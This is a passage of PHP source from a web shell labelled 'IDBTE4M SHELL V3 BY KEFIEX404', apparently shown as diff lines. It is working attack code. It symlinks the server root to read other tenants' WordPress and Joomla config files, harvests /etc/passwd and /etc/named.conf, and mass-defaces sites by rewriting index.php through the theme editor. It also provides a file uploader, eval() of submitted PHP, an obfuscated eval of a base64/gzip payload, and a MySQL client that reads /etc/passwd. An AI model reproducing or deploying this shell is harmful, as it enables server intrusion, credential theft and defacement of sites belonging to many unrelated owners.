- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"action=logout");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- $go = 1;
- }
- if($go) {
- $cond = 0;
- $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
- if(substr_count($_file,"/index.php") != 0){
- $output.= "[+] index.php loaded in Theme Editor<br />";
- $url2=$site_url."/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Updated Successfuly<br />";
- $hk = explode('public_html',$_file);
- $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
- $cond = 1;
- }
- } else {
- $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
- if(substr_count($_file,"index.php") != 0){
- $output.= "[+] index.php loaded in Theme Editor<br />";
- $url2=$site_url."/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template Updated Successfuly<br />";
- $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
- $cond = 1;
- }
- } else {
- $output.= "[-] index.php can not load in Theme Editor<br />";
- }
- }
- }
- } else {
- $output.= "[-] DB Error<br />";
- }
- global $base_path;
- unlink($base_path.'COOKIE.txt');
- return array('cond'=>$cond, 'output'=>$output , 'template'=> $template);
- }
- if($_POST['mode']==2) {
- // symlinking
- @mkdir('sym',0777);
- $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
- file_put_contents("sym/.htaccess",$htaccess);
- @symlink('/','sym/root');
- // getting sites from (/etc/passwd) file
- $named=file_get_contents($base_url.'/sym/root/etc/passwd/');
- $ar = explode('<li><a href="', $named);
- for($vi=2;$vi < count($ar);$vi++)
- {
- $var1 = strtok($ar[$vi], " ");
- $var1 = substr($var1,0,-2);
- $old=('.db');
- $new=('');
- $sites = str_replace($old , $new , $var1);
- file_put_contents('sites.txt',$sites);
- }
- // getting usernames
- $domains=file('sites.txt');
- foreach ($domains as $domain) {
- $order=("ls -la /etc/valiases/".$domain);
- $exec=exec($order);
- $filename = 'mail.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $exec."\n");
- fclose($fp);
- }
- $mail=file('mail.txt');
- foreach ($mail as $finaldom) {
- $user=tunisia($finaldom,"-rw-r----- 1 "," mail");
- $site=substr(strstr($finaldom, '/etc/valiases'),14);
- $filename = 'userdom.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $user.":". $site." ");
- fclose($fp);
- }
- $f=file_get_contents('userdom.txt');
- $finals=explode(" ",$f);
- foreach ($finals as $final){
- $strlen=('6');
- $dr=strlen ($final);
- if ($dr < $strlen) {
- $filename = 'fail.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final);
- fclose($fp);
- }
- else {
- $filename = 'success.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final."\n");
- fclose($fp);
- }
- }
- // now to work
- $index=$_POST['tunisia'];
- $url=($base_url);
- $a=file($base_url.'/success.txt');
- echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
- <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
- $khaled = fopen('defaced.html', 'a+');
- foreach ($a as $final) {
- list($user, $site_url) = explode(":", $final);
- $site_urlto = substr($site_url, 0, -1);
- // joomla symlinks
- $joomla=$url."/sym/root/home/".$user."/public_html/configuration.php";
- $joomla2=$url."/sym/root/home/".$user."/public_html/joomla/configuration.php";
- $joomla3=$url."/sym/root/home/".$user."/public_html/site/configuration.php";
- // wordpress symlinks
- $wordpress=$url."/sym/root/home/".$user."/public_html/wp-config.php";
- $wordpress2=$url."/sym/root/home/".$user."/public_html/blog/wp-config.php";
- $wordpress3=$url."/sym/root/home/".$user."/public_html/wp/wp-config.php";
- // first joomla guess
- if($joomla && preg_match('/dbprefix/i',$joomla)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($joomla, $index, $site_urlto);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/templates/'.$res['template'].'/index.php<br>');
- $count1 = $count1+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- // second joomla guess
- if($joomla2 && preg_match('/dbprefix/i',$joomla2)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($joomla2, $index, $site_urlto);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/joomla/'.$res['template'].'/index.php<br>');
- $count1 = $count1+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- // third joomla guess
- if($joomla3 && preg_match('/dbprefix/i',$joomla3)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($joomla3, $index, $site_urlto);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/site/'.$res['template'].'/index.php<br>');
- $count1 = $count1+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- // first wordpress guess
- if($wordpress && preg_match('/DB_NAME/i',$wordpress)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($wordpress, $index);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/wp-content/themes/'.$res['template'].'/index.php<br>');
- $count2++;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- // second wordpress guess
- if($wordpress2 && preg_match('/DB_NAME/i',$wordpress2)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($wordpress2, $index);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/blog/wp-content/themes/'.$res['template'].'/index.php<br>');
- $count2++;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- // third wordpress guess
- if($wordpress3 && preg_match('/DB_NAME/i',$wordpress3)){
- echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($wordpress3, $index);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($khaled, 'http://'.$site_urlto.'/wp/wp-content/themes/'.$res['template'].'/index.php<br>');
- $count2++;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
- echo '<a href="defaced.html" target="_blank">Show All</a><br />';
- }
- elseif($_POST['mode']==1) {
- @mkdir('sym',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('sym/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','sym/root');
- $dominios = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
- $out[1] = array_unique($out[1]);
- $numero_dominios = count($out[1]);
- echo "Total domains: $numero_dominios <br><br />";
- $def = $_POST['tunisia'];
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
- $output = fopen('defaced.html', 'a+');
- echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
- <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
- $j = 1;
- $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
- for($i = $st; $i <= $numero_dominios; $i++)
- {
- $domain = $out[1][$i];
- $dono_arquivo = @fileowner("/etc/valiases/".$domain);
- $infos = @posix_getpwuid($dono_arquivo);
- if($infos['name']!='root') {
- $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
- $config001 = @file_get_contents($base_url.$infos['name']."/public_html/joomla/configuration.php");
- $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
- $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
- if($config001 && preg_match('/dbprefix/i',$config001)){
- echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($config001, $def, $domain);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count1 = $count+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config01 && preg_match('/dbprefix/i',$config01)){
- echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($config01, $def, $domain);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count1 = $count+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config02 && preg_match('/DB_NAME/i',$config02)){
- echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $def);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count2 = $count2+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config03 && preg_match('/DB_NAME/i',$config03)){
- echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config03, $def);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count2 = $count2+1;
- } else {
- echo '<td align="center"><span class="blue">FAILED</span></td>';
- }
- echo '</tr>';
- }
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Defaced = '.$count1 + $count2.' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
- echo '<a href="defaced.html" target="_blank">Show All</a><br />';
- }
- else {
- echo '
- <table>
- <form method="post">
- <tr>
- <td>index url : </td>
- <td><input type="text" size="60" name="tunisia" placeholder="put your index url here !"></td>
- </tr>
- <tr>
- <td><input type="radio" checked="checked" value="1" name="mode"></td><td>/etc/named.conf</td>
- <td><input type="radio" value="2" name="mode"></td><td>/etc/passwd</td>
- <td><input type="submit" name="tunisia_deface" value="Deface"></td>
- </tr>
- </form>
- </center><p>
- -=[ IDBTE4M SHELL V3 BY KEFIEX404 ]=-
- </body>
- </html>
- ';
- }
- ?>
- <?php
- echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
- if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
- else { echo '<br /><br />Not uploaded !!<br><br>'; }
- }
- ?>
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=php" method="post">
- <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
- else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
- <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
- if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
- $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
- if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
- $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db']))
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
- if(isset($_GET['table'])) $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
- $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
- $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
- $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
- $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
- $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
- foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
- elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
- $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
- $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
- if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
- for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
- if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
- if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
- $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
- <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
- <input type="hidden" name="x" value="mysql" />
- <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
- <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
- <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
- <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
- <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
- <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
